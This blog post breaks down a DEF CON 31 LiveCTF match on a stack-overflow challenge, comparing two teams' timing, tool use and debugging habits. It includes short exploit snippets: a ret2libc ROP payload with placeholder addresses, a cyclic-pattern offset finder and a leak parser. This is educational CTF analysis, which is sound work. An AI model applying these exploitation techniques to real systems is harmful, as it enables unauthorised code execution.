Secrets of Speed: A LiveCTF Match Under the Microscope

As the CTF community has grown and the game has matured, we’ve seen an upward trend in both speed and sophistication of competitors and challenges, but one of the most interesting and pervasive questions remains: what do CTF champions do that sets them apart?

There’s not much data available on the actual performance of top CTF players, but today we’re going to dig into the recordings of a high-profile event: LiveCTF at DEF CON 31.

We’ll look at the tools and tactics of two world-class competitors, compare their performances, identify the turning point in the match, and talk about what we can learn from both of them.

If you want to play the challenge yourself (before any spoilers), check out this repo. The time to beat is 15:33… good luck!

What is LiveCTF? #

LiveCTF is an event currently held in conjunction with the DEF CON CTF: a series of challenges built to be solved quickly, streamed with sportscast-style commentary to share a breakdown of the action with viewers.

LiveCTF Website showing links to streams

At the DEF CON 31 CTF finals, LiveCTF was played as a double-elimination tournament in which the finalist teams competed in head-to-head, first-to-solve matches, with each match winner earning points toward their team’s overall DEF CON CTF score.

Each match was capped at 50 minutes, with hints dropped at 20 and 35 minutes. If neither player solved within the time limit, a “sudden death” challenge designed to be solved quickly decided the winner.

Screenshot of competitor’s instructions for LiveCTF at DEF CON 31 CTF Finals

While the challenge categories varied, the most common was Linux x86 binary exploitation (“pwnable”). Each challenge’s category was announced ahead of time to help teams pick their representative.

Early in the tournament, two head-to-head matches were played concurrently for each challenge, with one match commentated live and the other shown via a dual livestream of each player’s screen. These full-screen streams give an HD view into the techniques some of the top CTF competitors in the world used, and they’re the source for our detailed breakdown today.

Framework for solving CTF challenges #

In order to communicate about how players solve these kinds of challenges, it helps to have a framework that breaks down the process into different steps that we can watch the players go through.

While there’s no accepted framework for how to think about CTF challenges, most of the people I have spoken to tend to have the same general understanding of steps required, which I describe as:

  1. Determine the objective, or what we’re supposed to do
  2. Figure out what building blocks we have to work with
  3. Determine how we can use those building blocks to try to achieve the objective
  4. Successfully put together the building blocks and solve the problem

These are very generic because part of the fun of CTF is that you never know what weird stuff you’ll need to do for a challenge, and different people come up with different strategies and solutions.

This way of thinking about challenges also lets us talk about why a challenge is hard: in some cases what you can do is obvious, but figuring out how to do it is the hard part (and other challenges are the reverse).

Such a generic approach can also address larger or multi-layered challenges, where we go through this cycle several times, expanding what we can do until we can achieve the overall objective.

For a standard binary exploitation challenge like many of the LiveCTF challenges, those steps typically look something like:

  1. Objective: Achieve remote code execution (either by submitting a flag planted on a remote machine, or in the case of LiveCTF, running a binary to show you won)
  2. Building blocks: Reverse-engineer the target and find bug(s) to leverage
  3. Determine how to use the bugs to exploit the binary on the remote box
  4. Successfully exploit the binary on the remote machine and capture the flag!

Screenshot from the commentated stream of Shellphish winning the pastez challenge
An example of what winning a LiveCTF challenge at DEF CON 31 looked like for a competitor.

Different players tend to use a mix of strategies to solve such challenges, mostly depending on their own personal preferences. One of the big questions going into this year’s LiveCTF was how different the players’ strategies would be and whether certain strategies would dominate.

LiveCTF match under the microscope #

This analysis will cover a single challenge from the second day of LiveCTF: pastez, which was played in two head-to-head matches: #13: Norsecode vs Blue Water and #14: Shellphish vs P1G But S4D.

LiveCTF Bracket for DEF CON 31 highlighting pastez

Since match #14 got a live commentary, we focused on analyzing the dual livestreams of match #13 to get the juicy ground truth data.

One of the awesome parts about LiveCTF is that all the data is open, so you can check out the GitHub repo to see this problem and its reference solution, as well as see the problem & solution info for all of the other problems from LiveCTF.

The challenge pastez is a standard stack buffer overflow problem, where there aren’t a ton of reversing obstacles or exploit mitigations in play because it is supposed to be solvable in under 50 minutes.

While there were some simpler problems, pastez gave a good example of what a typical LiveCTF challenge looks like:

  • Limited number of functions to reverse-engineer
  • Easy-to-parse input menu
  • Limited mitigations: NX is on, but no stack canaries and no PIE (main binary not ASLR’d)
  • Expected solution is to leak a pointer and get a shell via ROP (ret2libc)
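To make that expected solution concrete, here is a rough sketch of how a ret2libc payload is typically assembled once the leak is in hand. Every offset and address below is an invented placeholder for illustration; the real values come from the leaked libc pointer and from gadgets in the non-PIE main binary.

```python
import struct

def p64(x: int) -> bytes:
    """Pack a 64-bit little-endian value (pwntools calls this p64)."""
    return struct.pack("<Q", x)

# Hypothetical placeholder values -- not taken from the real pastez binary.
OFFSET_TO_RET = 72              # padding up to the saved return address
POP_RDI = 0x401234              # 'pop rdi; ret' gadget in the non-PIE binary
RET = 0x401235                  # bare 'ret' gadget for 16-byte stack alignment
LIBC_SYSTEM = 0x7F0000052290    # system(), computed from the leaked pointer
LIBC_BINSH = 0x7F00001B45BD     # address of "/bin/sh" inside libc

payload = b"A" * OFFSET_TO_RET
payload += p64(RET)             # re-align the stack before calling system
payload += p64(POP_RDI)
payload += p64(LIBC_BINSH)      # rdi = address of "/bin/sh"
payload += p64(LIBC_SYSTEM)     # return into system("/bin/sh")
```

The bare `ret` gadget matters more than it looks: glibc’s `system` assumes a 16-byte-aligned stack, and the extra return slot fixes the alignment.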

So let’s see how the competitors did!

Speed solving breakdown #

Since we have uninterrupted feeds for Norsecode and Blue Water, we can observe everything they did over the course of the match, but looking at data spanning the entire 15 minutes and 33 seconds of the match doesn’t capture the detail of what happened.

So instead we’ll break it down into three phases following the general framework from the previous section and set checkpoints to get a sense of when they transition from one phase into the next.

Breaking down the problem this way allows us to see how fast Blue Water and Norsecode moved through the phases and also dig deeper into what they did in each specific phase. The three checkpoints I picked for pastez to mark the end of each phase are:

  1. Phase 1: Figure out the bug
    • Checkpoint 1: time of first segfault showing the competitor had figured out the buffer overflow
  2. Phase 2: Determine exploitation strategy
    • Checkpoint 2: time of libc leak, since ret2libc required such an infoleak
  3. Phase 3: Exploit remote server and run the submission binary to win
    • Checkpoint 3: time when submission binary is run

Screenshot of Norsecode printing out the infoleak in garbled unicode form
Screenshot of Norsecode hitting Checkpoint 2: leaking a libc pointer (as binary data).

If we look at the time breakdown for each of these checkpoints, we can see that while Blue Water hits Checkpoint 1 first, Norsecode isn’t far behind… and then Norsecode storms through the remaining steps with impressive speed:

| Checkpoint | Blue Water | Norsecode |
| --- | --- | --- |
| Checkpoint 1 | 8:36: segfault observed | 9:31: segfault observed |
| Checkpoint 2 | 15:33: match ends | 13:02 (+3:31): libc leak printed to terminal |
| Checkpoint 3 | - | 15:33 (+2:31): win submitted |

Bar graph of each competitors’ time to each checkpoint

One of the interesting things about LiveCTF is that we observed almost exactly the same general toolkit used across all the competitors:

  • Reverse Engineering: IDA or Ghidra
  • Debugging: gdb with a CTF gdbinit (pwndbg, GEF, or PEDA)
  • Script writing: VSCode or vim, usually using Python and pwntools

If we look at how much time each competitor spends using each of these tools in the different phases, we can see a clear difference:

| Tools | Blue Water Phase 1 | Norsecode Phase 1 | Blue Water Phase 2 | Norsecode Phase 2 | Norsecode Phase 3 |
| --- | --- | --- | --- | --- | --- |
| IDA | 6:41 | 5:26 | 3:46 | 0:00 | 0:00 |
| Terminal | 1:30 | 1:44 | 2:24 | 1:19 | 0:46 |
| VSCode | 0:00 | 1:46 | 0:47 | 2:12 | 1:45 |
| Startup | 0:25 | 0:35 | - | - | - |
| Total | 8:36 (0:00-8:36) | 9:31 (0:00-9:31) | 6:57 (8:36-15:33) | 3:31 (9:31-13:02) | 2:31 (13:02-15:33) |

Bar graph of tool usage time for each player and phase

After Norsecode gets the first checkpoint (the initial crash), they never return to reversing and proceed strictly with debugging the target and iterating on their solution script. This is in contrast to their competitor, who went back to RE and spent less time scripting and debugging.

My first question was: what did each competitor look at in IDA, and was there a difference that led one of them to figure out the bug and the exploitation strategy faster? We can examine how much time each competitor spent on each function or component during phase 1, which is when they initially find and understand the bug:

| Function/Component | Blue Water | Norsecode |
| --- | --- | --- |
| Total phase 1 RE | 6:41 | 5:26 |
| sanitize | 2:40 | 1:45 |
| insert_message | 1:09 | 0:42 |
| main | 0:52 | 1:38 |
| rud_messages | 0:49 | 0:30 |
| edit_message | 0:34 | 0:15 |
| bad_words (.data) | 0:16 | 0:07 |
| print_messages | 0:09 | 0:06 |
| Structures Tab | 0:08 | 0:18 |
| Strings Tab | 0:03 | - |
| delete_message | 0:01 | 0:05 |

Relevant call graph for pastez
The call graph for pastez gives a sense of size; the binary is small but not trivial.

The first impression from watching these competitors perform RE is that they are both very fast, reversing and triaging functions in a matter of seconds, moving extremely quickly between functions, and needing only a few minutes to find the bug.

The second thing we notice is that their analysis times are very similar, with the same top four functions for both players. Both spent the most time looking at the sanitize function, which is where the stack buffer is allocated and where the overflow occurs.

Blue Water spent more time in IDA, but they also got a crash faster, so I’d argue these performances are evenly matched with Blue Water having a slight edge. Nothing else particularly stands out for phase 1 reversing.

Since there wasn’t a major difference on the static analysis side, let’s look at the dynamic analysis: how many times did each player run the target and how did they run it?

| Run type | Blue Water | Norsecode |
| --- | --- | --- |
| Without debugger | 7 | 1 |
| With gdb (command-line) | 3 | 0 |
| Under solve script | 4 | 22* |
| Total runs | 14 | 23 |
| Runs before first crash | 7 | 11 |

*Norsecode’s solve script ran the target under gdb automatically

This matches up with the data we’ve seen so far: Blue Water spent more time doing static analysis overall. There’s no right answer for how to balance static and dynamic analysis, and it varies depending on the player and the problem, but we can also see that Blue Water ran the target manually 50% of the time.

While this data may suggest certain conclusions, we have to look at it in context to see what really made the difference in this match.

Deciding factors in a speed challenge #

Since Norsecode ended up winning after 15 minutes and 33 seconds, we don’t get to see how fast Blue Water would have been able to solve… but the winner of the other match (Shellphish) took almost 22 minutes longer to solve, so we can tell that Norsecode was doing something right!

This time variance is what we saw a lot in LiveCTF: many parts of the match were neck-and-neck, and the difference usually came down to who was “stuck” for less time.

A player taking a note indicating their momentary confusion
Getting stuck is an integral part of CTF. Getting un-stuck fast is the key.

Capitalizing on the overwrite #

Since Norsecode cleared checkpoints 2 and 3 before Blue Water finished checkpoint 2, the big question is “what was the difference in the players’ actions after the first checkpoint (getting the initial crash)?”

Right after seeing the segfault, Norsecode went directly to getting precise control of the return address overwrite.

Norsecode’s overflow as shown in gdb
Norsecode’s overflow as shown in gdb.

This is in contrast to Blue Water’s actions after seeing the crash, which were to split time between the debugger and IDA. My theory is that they weren’t as efficient because their initial crash was from a longer overwrite that crashed in strchr in the middle of sanitize, instead of showing that the return address was overwritten at the end of sanitize like Norsecode saw.

Blue Water’s overflow as shown in gdb
Blue Water’s overflow as shown in gdb.

Part of this is luck, but I think the other part is that Norsecode had more precise control of their overflow because they were primarily using their script to exercise the target. They also see the same crash in strchr right after their initial segfault, but they then dial in their overflow and isolate the return address using a cyclic pattern.
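That cyclic-pattern trick is worth spelling out. Tools like pwntools provide `cyclic`/`cyclic_find` for this; a minimal standalone version in the style of Metasploit’s pattern_create (a sketch, not the players’ actual tooling) might look like:

```python
import string
import struct

def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern (unique up to 20,280 bytes) so that
    a value recovered from a crash maps back to a single input offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])

def pattern_offset(value: int, length: int = 20280) -> int:
    """Given e.g. the overwritten saved return address seen in gdb,
    find the offset into the input that reached it."""
    needle = struct.pack("<Q", value).rstrip(b"\x00")
    return pattern_create(length).find(needle)
```

Sending `pattern_create(200)` as the overflowing input and feeding the faulting value back through `pattern_offset` pins down exactly where the saved return address sits, with no manual counting.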

After Blue Water gets their initial crash, they look at the strchr call and try to isolate the buffer and where it is written. They take good steps to go between IDA and gdb to follow the overwrite, and then build out their script to get better control, but this is where they really lose momentum.

And so this ends up being the turning point in the match: how each competitor debugged the crash and transitioned to a useful overwrite.

At this point I have to point out that it’s easy to play back the performance and comment, but we can’t judge these competitors.

They were under a ton of stress playing in the DEF CON CTF finals, and it’s easy to sit on the sidelines and second-guess them. The LiveCTF event was essentially a full-on sprint in the middle of an ultramarathon, so any mistakes that players make are not a reflection on their skill; all the competitors were truly top-tier.

Secrets of speed #

In general though, Norsecode’s performance is a good one to learn from because they execute cleanly and recover quickly when they don’t get something right on the first try, for example:

  • They figured out pretty quickly that spaces are needed between instances of the word “hack” to get the overwrite (which is actually a really nice touch by the challenge author because it tripped up both competitors, though not for too long)
  • Later their libc leak is misaligned by one byte, but they saw and corrected it very quickly
  • At the very end they had to add an extra RET gadget to get the stack properly aligned for when they ROP to system
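On the leak fix in particular: a leaked 64-bit libc pointer typically arrives as only six raw bytes mixed in with other output, and a one-byte misalignment turns it into garbage. A sketch of the usual unpack-and-correct step (the address and stray byte here are invented):

```python
import struct

def parse_leak(raw: bytes, skip: int = 0) -> int:
    """Interpret up to 8 leaked bytes as a little-endian pointer.
    skip drops stray bytes from the front when the leak is misaligned."""
    chunk = raw[skip:skip + 8].ljust(8, b"\x00")
    return struct.unpack("<Q", chunk)[0]

LEAKED = 0x7F123456789A                       # hypothetical libc address
wire = b"\n" + struct.pack("<Q", LEAKED)[:6]  # stray byte precedes the 6 pointer bytes

assert parse_leak(wire) != LEAKED             # off by one byte: garbage value
assert parse_leak(wire, skip=1) == LEAKED     # drop the stray byte: correct
```

Recognizing in seconds that a nonsense leak value is “a real pointer shifted by one byte” is exactly the kind of pattern recognition that practice buys.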

The ability to do this at high speed shows how practiced they are; this is what helps them keep a clear understanding of what they’re looking at and anticipate what problems might arise. They do it so quickly that it’s easy to miss unless you’re really watching closely and following along (which is also an excellent way to learn).

As for general strategies for success, I think there were two that were shown this match:

  1. It helps to work step-by-step, focusing on what’s next: always moving directly towards answering your next question (e.g. “I have a stack buffer overflow, what can I do with it?”), revisiting/consolidating what you know when needed, and using the best tool for answering the current question (exploring an overwrite: focus on the debugger).
  2. Script to win: focusing on using your solve script to actuate the target seems to be a dominant strategy, because it can also run the target in a debugger if you set it up right. Plus, it saves you keystrokes because you don’t need to type things in two places.
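A sketch of that script-to-win setup using only the standard library (pwntools users get the same effect by swapping `process()` for `gdb.debug()`); the binary name here is a hypothetical local copy:

```python
import sys

TARGET = "./pastez"  # hypothetical local copy of the challenge binary

def launch_cmd(debug: bool) -> list:
    """Build the command line so the same solve script can start the
    target directly or under gdb -- the exploit logic is written once."""
    if debug:
        # 'gdb --args' treats everything after it as the target's own argv
        return ["gdb", "-q", "-ex", "run", "--args", TARGET]
    return [TARGET]

cmd = launch_cmd("--debug" in sys.argv)
# subprocess.Popen(cmd, stdin=PIPE, stdout=PIPE) would then drive the
# menu, send the overflow, and read back the leak -- identically in
# both modes.
```

The payoff is that every debugging run exercises the exact same byte stream the final exploit will send, so there’s no drift between what you tested and what you submit.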

If there was one tool that I’d be interested to see competitors try out in the future, it would be reversible debugging. Getting gdb configured for this isn’t always easy depending on the environment, but being able to rewind and see exactly where a buffer overflow happened can be a lot easier than re-running the target a bunch of times.
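As a sketch of what that might look like, a recording session driven from a gdbinit-style script could use gdb’s built-in process record (the watchpoint expression below is a hypothetical example; in practice you’d watch the address of the clobbered stack slot found from the crash):

```gdb
# hypothetical gdbscript fragment -- record, crash, then rewind
break main
run
record full                # start software-recorded execution at main
continue                   # let the target run until the segfault
watch *(long long *)$rsp   # hypothetical: watch the clobbered return slot
reverse-continue           # rewind to the instruction that wrote it
info record                # show how many instructions were captured
```

Software recording is slow, but for a small CTF binary it can replace many re-runs with a single rewind.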

Other than that, it seems to help if you’re deeply familiar with your tools, experienced with challenge patterns and solving strategies, and really fast at reading and writing code… but that really just comes down to a lot of practice and getting reps in.

Lessons learned from LiveCTF #

So after diving that deep into the nitty gritty of hacking under pressure, it’s pretty obvious that these players are really good at what they’re doing… and that LiveCTF is a great resource for picking up tips, techniques, and strategies from top CTF players.

To keep up with future events, follow LiveCTF on Twitter.

Personally I think these kinds of events are a fantastic way to get good at software security because they push us to be flexible and go outside our comfort zone, and many of the skills transfer directly to real-world applications.

If you liked this breakdown of intense CTF action please follow or let me know what you thought on Twitter or Mastodon. It takes a lot of work to put something like this together, but I hope you enjoyed it!

Til next time, CTF fans!